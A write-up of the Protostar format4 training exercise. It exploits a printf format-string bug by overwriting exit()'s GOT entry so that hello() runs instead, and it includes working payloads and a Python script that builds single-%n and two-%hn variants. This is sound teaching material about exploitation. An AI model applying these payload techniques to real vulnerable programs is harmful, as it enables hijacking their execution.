This is the last task of the Protostar format string series. I got a lot of experience from this lab. Thanks.
Description

format4 looks at one method of redirecting execution in a process.

Hints: objdump -TR is your friend.

This level is at /opt/protostar/bin/format4
format4.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);   /* user input is used directly as the format string */

  exit(1);          /* exit() is called through the GOT, which is the overwrite target */
}

int main(int argc, char **argv)
{
  vuln();
}
This task is a little different from the previous ones: there is no target variable to set, we have to redirect execution into hello(). Let's try.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%08x."*100')) | ./format4
AAAA00000200.b7fd8420.bffff614.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.
AAAA (0x41414141) shows up at position 4, so the fourth argument printf() reads from the stack is the start of our own buffer. We can confirm that with a direct parameter access:
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%4$08x."')) | ./format4
AAAA41414141.
vuln() calls exit(1) right after printf(buffer). exit() lives in libc and is reached through its GOT entry, so if we overwrite that entry with the address of hello(), the call to exit() lands in hello() instead. First we need the address of the GOT entry; objdump -TR prints the dynamic relocation records, which include the jump slots.
[email protected]:/opt/protostar/bin$ objdump -TR ./format4

./format4:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000  w   D  *UND*  00000000              __gmon_start__
00000000      DF *UND*  00000000  GLIBC_2.0   fgets
00000000      DF *UND*  00000000  GLIBC_2.0   __libc_start_main
00000000      DF *UND*  00000000  GLIBC_2.0   _exit
00000000      DF *UND*  00000000  GLIBC_2.0   printf
00000000      DF *UND*  00000000  GLIBC_2.0   puts
00000000      DF *UND*  00000000  GLIBC_2.0   exit
080485ec g    DO .rodata  00000004  Base        _IO_stdin_used
08049730 g    DO .bss     00000004  GLIBC_2.0   stdin

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit
Now we have the GOT slot of exit(): 0x08049724 (R_386_JUMP_SLOT for exit). Note that this is not the address of exit() itself but the 4-byte pointer the PLT jumps through; that pointer is what we overwrite. Put it at the start of the input in little-endian order and check that argument 4 now holds it:
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\x24\x97\x04\x08"+"%4$08x."')) | ./format4
$�08049724.
The leading "$" and the garbage after it are just the four address bytes echoed back (0x24 is "$", the other three are not printable); the %4$08x confirms argument 4 is 0x08049724. Next we need the address of hello(), the value we want to write into that slot:
[email protected]:/opt/protostar/bin$ objdump -t ./format4 | grep hello
080484b4 g     F .text  0000001e              hello
Convert it to decimal, because %n writes the number of characters printed so far and the padding width has to be given in decimal:
[email protected]:/opt/protostar/bin$ let x=0x080484b4; echo $x;
134513844
Then subtract 4: the four address bytes at the start of the input are printed too and already count toward the %n total, so the padding only has to supply the rest. 134513844 - 4 = 134513840
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\x24\x97\x04\x08"+"%134513840u"+"%4$08n"')) | ./format4

How it works: after the 4 address bytes, %134513840u prints one stack word padded to 134513840 characters, bringing the running count to 134513844 = 0x080484b4. %4$n then stores that count as a 4-byte integer at the address held in argument 4, which is 0x08049724, the GOT slot of exit(). When vuln() reaches exit(1), the PLT jumps through the overwritten slot and hello() runs instead. Be aware that this payload makes printf() emit roughly 128 MiB of padding before the redirect happens; the usual shortcut is to split the write into two 16-bit %hn writes so the widest padding stays under 65536 characters.
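As an added example (not part of the original write-up), here is a Python 3 script that builds the single-%n payload used above, builds the shorter two-%hn variant, and checks both against a small model of printf's character counting. The model uses the argument layout observed earlier on this page (three unrelated words at positions 1 to 3, then the buffer from position 4) and the addresses from the objdump output; the simulator, the helper names (single_n_payload, short_write_payload, simulate_printf, resulting_got_entry) and the decision to only understand %u and %n conversions are my own.

```python
import re
import struct

# Addresses taken from the objdump output on this page.
EXIT_GOT = 0x08049724   # R_386_JUMP_SLOT for exit(): the 4 bytes we overwrite
HELLO = 0x080484B4      # address of hello(): the value we want in that slot

# Words printf() reads before reaching the buffer, as shown by the %08x dump
# above (positions 1-3); the buffer itself starts at position 4.
STACK_PREFIX = [0x00000200, 0xB7FD8420, 0xBFFFF614]


def p32(addr):
    """Pack a 32-bit little-endian address, as in the page's payload bytes."""
    return struct.pack("<I", addr)


def single_n_payload(got_addr, value, pos):
    """The page's technique: one %n write of the whole 32-bit value.

    %n stores the number of characters printed so far, and the 4 address
    bytes at the start of the input already count, so the %u width is value - 4.
    """
    return p32(got_addr) + ("%%%du%%%d$n" % (value - 4, pos)).encode()


def short_write_payload(got_addr, value, pos):
    """Alternative: two %hn writes of 16 bits each, low half to got_addr and
    high half to got_addr + 2, so the widest padding stays below 65536 instead
    of the ~128 MiB the single %n payload prints. The two addresses occupy
    argument positions pos and pos + 1, in the order they are written.
    """
    halves = [(got_addr, value & 0xFFFF), (got_addr + 2, value >> 16)]
    halves.sort(key=lambda h: h[1])        # smaller count first: padding only grows
    payload = b"".join(p32(addr) for addr, _ in halves)
    written = len(payload)
    fmt = ""
    for i, (_, half) in enumerate(halves):
        # %hn keeps only the low 16 bits of the count, so work modulo 2**16
        pad = (half - written) % 0x10000
        if pad < 10:
            # a width this small may be shorter than the digits of the stack
            # word %u prints; wrap around once more to get a reliable width
            pad += 0x10000
        fmt += "%%%du%%%d$hn" % (pad, pos + i)
        written += pad
    return payload + fmt.encode()


# Just enough of printf's grammar for these payloads: %[pos$][width][h|hh](u|n)
_SPEC = re.compile(rb"%(?:(\d+)\$)?(\d*)(hh|h)?([un])")


def simulate_printf(fmt, stack, mem):
    """Model printf(buffer) for the conversions used here.

    `stack` holds the 32-bit words printf would fetch as arguments 1..N and
    `mem` is a dict address -> byte that receives the %n / %hn / %hhn writes.
    Returns the number of characters printf would have printed.
    """
    count = 0
    next_arg = 0          # non-positional conversions consume arguments in order
    i = 0
    while i < len(fmt):
        m = _SPEC.match(fmt, i)
        if m is None:     # ordinary byte: printed as-is
            count += 1
            i += 1
            continue
        pos, width, size, conv = m.groups()
        if pos:
            arg = stack[int(pos) - 1]
        else:
            arg = stack[next_arg]
            next_arg += 1
        if conv == b"u":
            # %Nu prints at least N characters, more if the value needs them
            count += max(len(str(arg)), int(width) if width else 0)
        else:
            nbytes = {None: 4, b"h": 2, b"hh": 1}[size]
            for k in range(nbytes):
                mem[arg + k] = (count >> (8 * k)) & 0xFF
        i = m.end()
    return count


def stack_for(payload):
    """Stack as printf sees it in format4: three unrelated words, then the buffer."""
    words = list(STACK_PREFIX)
    for off in range(0, len(payload) - 3, 4):
        words.append(struct.unpack("<I", payload[off:off + 4])[0])
    return words


def read32(mem, addr):
    return sum(mem.get(addr + k, 0) << (8 * k) for k in range(4))


def resulting_got_entry(payload):
    """Run the payload through the model and return what ends up in exit's GOT slot."""
    mem = {}
    simulate_printf(payload, stack_for(payload), mem)
    return read32(mem, EXIT_GOT)


if __name__ == "__main__":
    for name, payload in [("single %n", single_n_payload(EXIT_GOT, HELLO, 4)),
                          ("two %hn", short_write_payload(EXIT_GOT, HELLO, 4))]:
        print("%-10s %r -> exit GOT = 0x%08x" % (name, payload, resulting_got_entry(payload)))
```

Both payloads mix a positional %4$n with a non-positional %u, which the C standard leaves undefined but glibc accepts, and the page's own payload relies on the same behaviour. The model deliberately counts a %u as max(width, digits of the stack word) because that is what makes very small widths unreliable in real payloads; feeding the payloads to the actual binary is still the only real test.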